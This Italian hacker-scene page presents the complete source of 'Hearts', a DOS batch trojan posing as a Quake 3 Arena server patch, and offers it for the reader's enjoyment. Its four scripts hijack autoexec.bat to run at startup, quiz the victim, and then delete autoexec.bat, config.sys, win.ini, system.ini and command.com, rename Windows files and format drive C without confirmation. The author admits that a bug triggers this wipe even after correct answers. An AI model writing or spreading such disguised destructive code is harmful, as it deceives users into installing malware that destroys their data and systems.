(¯`·._.·[°o.OKinG-InFeTO.o°]·._.·´¯)

**Virus Hearts**

 

Questo è un virus che si spaccia per una patch per aggiornare i servers di Quake

3 Arena. Si struttura in 4 files programmati in DOS. Il primo:

----------------------------------------------------

 

Non fa altro che crare la cartella "SBCKP" (dove copia l'Autoexec) e copiare i

files "Srvlist.bat" e "Patch.com" dalla dyrectory di Q3 arena (nella quale

l'autozippante l'aveva messi) il primo in C:\ e il secondo nella cartella

"System" di Win (Verrà poi rinominato "Hearts.com")

 

Q3PATCH

 

@echo off

md c:\windows\sbckp\

copy c:\autoexec.* c:\windows\sbckp

copy c:\progra~1\quakei~1\srvrlist.bat c:\

copy c:\progra~1\quakei~1\patch.com c:\windows\system

ren c:\srvrlist.bat autoexec.bat

ren c:\windows\system\patch.com Hearts.com

exit

-----------------------------------------------------

 

Questo è secondo me il file più importante dopo il virus di per se, perchè ne

permette l'avvio. Osserviamolo...

In pratica, si sostituisce all'Autoexec in modo da essere eseguito all'avvio in

DOS del pc. Carica la scheda video in modalità EGA, la Keyboard in italiano e

(logicamente) il nostro virus, l'Hearts.com.

 

SRVRLIST

 

@echo off

mode con codepage prepare=((850) C:\WINDOWS\COMMAND\ega.cpi)

mode con codepage select=850

keyb it,,C:\WINDOWS\COMMAND\keyboard.sys

start "C:\WINDOWS\SYSTEM\Hearts.com"

-----------------------------------------------------

 

Questo è il virus vero e proprio, è molto semplice, ma micidiale. Come RR1 fa le

solite 3 domande, solo che invece di scrivere la risposta bisognerà sceglierla

dall'elenco proposto. Quindi diventa tutto più facile. Ovvio che se si

sbaglia... Fare inoltre presente a quando il Virus stesso suggerisce di non

spengere il PC, poichè sarebbe facile ogni volta che si sbaglia riavviare il PC

e ricominciare, ma non si può. Infatti appena viene eseguita la procedura di

fallimento, viene sostituito di nuovo l'Autoexec.bat con un altro che penserà

solo a visualizzare un messaggio prima di cominciare la formattazione. Nel caso

che si risponda bene a tutte e 3 le domande tornerà tutto come prima,

ripristinando gli Autoexec e cancellando il virus. Teoricamente dovrebbe finire

tutto qui, ma per un bug, anche dopo aver risposto correttamente passa alla

procedura di fallimento (proverò a risolvero ma in fondo è troppo divertente =).

 

PATCH

@echo off

cls

echo.

echo.

echo MALE, RAGAZZO...

echo.

echo.

echo STAVOLTA HAI PRESO UN "ORRENDO" VIRUS (ME)

echo.

echo.

echo MI SPIACE MA NON STO PROPRIO SCHERZANDO....

pause

cls

echo.

echo.

echo ORA TI FACCIO TRE DOMANDE, LE STESSE DI rr1, SPERO TU LE CONOSCA...

echo.

echo.

echo SE RISPONDERAI CORRETTAMENTE A TUTTE E TRE NON MI RIVEDRAI MAI PIU', ALTRIMENTI......

pause

cls

echo.

echo.

echo E NON SPENGERE IL COMPUTER, MI RITROVERESTI QUI....

pause

cls

echo.

echo.

:1

echo ECCOTI LA PRIMA DELLE TRE DOMANDE:

echo.

echo QUAL E' IL NOME DI MITNICK?

echo.

echo A = Paul

echo B = Nick

echo C = Kevin

echo.

choice /c:ABC /n CHE SCEGLI?

if errorlevel 3 goto 2

if errorlevel 2 goto 7

if errorlevel 1 goto 7

:2

echo.

choice /c:SN /n SEI PROPRIO SICURO? Sì No

if errorlevel 2 goto 1

if errorlevel 1 goto 3

:7

echo.

choice /c:SN /n SEI PROPRIO SICURO? Sì No

if errorlevel 2 goto 1

if errorlevel 1 goto fallito

:3

cls

echo BENE, LA PRIMA L'HAI PRESA. VEDIAMO LA SECONDA:

echo.

echo QUAL E' IL SISTEMA OPERATIVO PIU' USATO NELLE RETI?

echo.

echo A = Windows NT WorkStation 4.0

echo B = Unix

echo C = OS/2 Warp

echo.

choice /c:ABC /n CHE SCEGLI?

if errorlevel 3 goto 8

if errorlevel 2 goto 4

if errorlevel 1 goto 8

:4

echo.

choice /c:SN /n NE SEI COSI' DANNATAMENTE CERTO? Sì No

if errorlevel 2 goto 3

if errorlevel 1 goto 5

:8

echo.

choice /c:SN /n NE SEI COSI' DANNATAMENTE CERTO? Sì No

if errorlevel 2 goto 3

if errorlevel 1 goto fallito

:5

cls

echo UHM... STAI ANDANDO BENE! ORA L'ULTIMA:

echo.

echo IL COMPUTER DA' SEMPRE LA PRECEDENZA AD UN TIPO DI FILE. QUALE?

echo.

echo A = SYS

echo B = COM

echo C = EXE

echo.

choice /c:ABC /n CHE SCEGLI?

if errorlevel 3 goto 9

if errorlevel 2 goto 6

if errorlevel 1 goto 9

:6

echo

choice /c:SN /n E' L'ULTIMA, SE SBAGLI SEI FATTO. SEI SICURO? Sì No

if errorlevel 2 goto 5

if errorlevel 1 goto drago

:9

echo.

choice /c:SN /n E' L'ULTIMA, SE SBAGLI SEI FATTO. SEI SICURO? Sì No

if errorlevel 2 goto 5

if errorlevel 1 goto fallito

:drago

cls

echo.

echo.

echo.

echo COMPLIMENTI, SEI UN VERO CAMPIONE, UN DRAGO, DIREI...

pause

echo.

echo COME PROMESSO, MI CANCELLERO'

pause

echo.

echo IL MIONOME ERA "Hearts.com" E MI TROVAVO IN:

pause

echo.

echo C:\Windows\System

pause

echo.

echo MI HAI PRESO CON UNA FANTOMATICA PATCH PER QUAKE 3 ARENA. CI SEI CASCATO IN PIENO!!!

pause

echo.

echo RICORDATI DI NON ACCETTARE MAI PIU' FILES DA SCONOSCIUTI!!!!

pause

echo.

cls

echo.

echo.

echo ORA RIMETTERO' TUTTO A POSTO.

echo.

echo.

echo BASTA CHE PREMI UN TASTO! UN ULTIMA COSA:

echo.

echo.

echo.

echo BUONA GIORNATA !!!!!

pause

del c:\autoexec.bat

copy c:\windows\sbckp\*.* c:\ > nul

del c:\windows\sbckp

del c:\windows\system\Hearts.com > nul

goto ok

:ok

exit

:fallito

@del c:\autoexec.bat

@copy c:\progra~1\quakei~1\list.bat c:\

@ren c:\list.bat autoexec.bat

cls

echo SPIACENTE MA HAI SBAGLIATO.... TE LO AVEVO DETTO DI STARE ATTENTO!

echo.

echo ......SEI SOLO UN IGNORANTONE......

echo.

echo ORA TI SPIEGO COSA FARO' AL TUO BEL PICCI':

pause

cls

echo 1) Cancello il file Autoexec.bat (E col cacchio che mi riaccendi)

echo 2) Cancello il file Config.sys (E col cacchio che ritrovi le periferiche)

echo 3) Cancello il file Win.ini (E col cacchio che ti riparte Windows)

echo 4) Cancello il file System.ini (E col cacchio che il sistema rimane stabile)

echo 5) Rinomino tutti i file .exe di C:\WINDOWS in .dio (Perchè sì)

echo 6) Sposto tutti i file .sys in una cartella X (E col cacchio che li riprendi)

echo 7) Cancello il file Command.com (E col cacchio che ti parte MS-DOS)

echo.

echo E IL TUTTO SENZA RICHIESTA DI CONFERMA, CICCIO....!

echo.

echo MA TANTO CHE HAI PERSO TEMPO A LEGGERE, HO GIA' FATTO TUTTO... PERCIO'

ARRIVEDERCI A PRESTO, NELLA SPERANZA CHE LA PROSSIMA VOLTA AVRAI......

echo.

pause

cls

echo STUDIATO!! STUDIATO!! STUDIATO!! STUDIATO!! STUDIATO!! STUDIATO!! STUDIATO!! STUDIATO!! STUDIATO!! STUDIATO!! STUDIATO!! STUDIATO!! STUDIATO!! STUDIATO!! STUDIATO!! STUDIATO!! STUDIATO!! STUDIATO!! STUDIATO!! STUDIATO!! STUDIATO!! STUDIATO!! STUDIATO!! STUDIATO!!

del c:\autoexec.bat

del c:\config.sys

del c:\windows\win.ini

del c:\windows\system.ini

ren c:\windows\*.* *.dio

md c:\windows\sistemac

copy c:\windows\system\*.sys c:\windows\sistemac > nul

del c:\command.com

exit

-----------------------------------------------------

Questo è il magico file che si attiva una volta sbagliata una domanda, è molto

esplicito, proprio perchè, se viene visualizato, vuol dire che qualcuno ha fatto

il furbo ed ha spento il PC ed è questo che si merita: (ed in più fa anche la

formattazione senza conferma)

 

LIST

@echo off

echo.

echo.

echo E COSI' HAI FATTO IL FURBO E HAI SPENTO IL COMPUTER? STRONZO!!!!

echo.

echo.

echo COL CAZZO CHE TI CHIEDO LA CONFERMA! TUTTO E SUBITO! SENZA CONFERMA!

echo.

echo.

echo MAGARI MORI STASERA

del c:\autoexec.bat

del c:\config.sys

del c:\windows\win.ini

del c:\windows\system.ini

ren c:\windows\*.* *.dio

md c:\windows\sistemac

copy c:\windows\system\*.sys c:\windows\sistemac > nul

del c:\command.com

format C: /autotest

exit

-----------------------------------------------------

Spero vi piaccia....

Questo sito è pubblicato sotto una Licenza Creative Commons